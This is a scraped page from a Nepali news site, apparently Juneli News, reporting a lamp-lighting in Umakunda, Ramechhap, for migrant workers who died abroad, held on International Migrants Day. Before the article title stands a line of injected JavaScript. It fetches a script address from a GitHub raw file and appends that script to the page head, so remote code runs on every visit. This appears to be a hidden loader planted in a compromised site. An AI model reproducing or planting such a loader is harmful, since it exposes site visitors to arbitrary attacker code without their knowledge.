;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); उमाकुण्डमा वैदेशिक रोजगारको क्रममा मृत्यु भएकाहरुको नाममा दीप प्रज्वलन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • उमाकुण्डमा वैदेशिक रोजगारको क्रममा मृत्यु भएकाहरुको नाममा दीप प्रज्वलन
चलचित्र

उमाकुण्डमा वैदेशिक रोजगारको क्रममा मृत्यु भएकाहरुको नाममा दीप प्रज्वलन

पुष ०४,

रामेछाप । रामेछापको उमाकुण्ड गाउँपालिकाले वैदेशिक रोजगारको क्रममा मृत्यु भएकाहरुको नाममा दीप प्रज्वलन गरेको छ ।

शुक्रबार २० औ अन्तरास्ट्रिय आप्रवासन कामदार दिवस १८ डिसेम्बर २०२० को अवसरमा पालिकाको केन्द्र प्रिती ज्यादालुमा दिप प्रज्वलन गरेको हो ।

सीप र रोजगार :आर्थिक समृदिको आधार भन्ने नारा सहित शुक्रबार दिवस मनाईएको छ । संयुक्त राष्ट्रसंघको महासभाले हरेक वर्षको डिसेम्बर १८ को दिनलाई अन्तर्राष्ट्रिय आप्रवासन दिवसको रुपमा मनाउने गरेको छ । त्यसलाई समर्थन गर्दै नेपालले पनि हरेक वर्षको डिसेम्बर १८ का दिन विभिन्न कार्यक्रमहरु गरेर अन्तर्राष्ट्रिय आप्रवासन दिवस मनाउँदै आइरहेको छ ।

आप्रवासीहरुमाथि हुने विभेदलाई मध्यनजर गर्दै संयुक्त राष्ट्रसंघबाट सन् १९९० डिसेम्बर १८ का दिन आप्रवासी कामदार र तिनका पारिवारका सदस्यहरुको अधिकार संरक्षणसम्बन्धी महासन्धि पारित भएको थियो । यो महासन्धि सन् २००३ जुलाई १ देखि लागू गरेपछि आजकै दिनलाई अन्तर्राष्ट्रिय आप्रवासन दिवसको रुपमा मनाउन थालिएको हो ।

फेसबुक प्रतिक्रियाहरु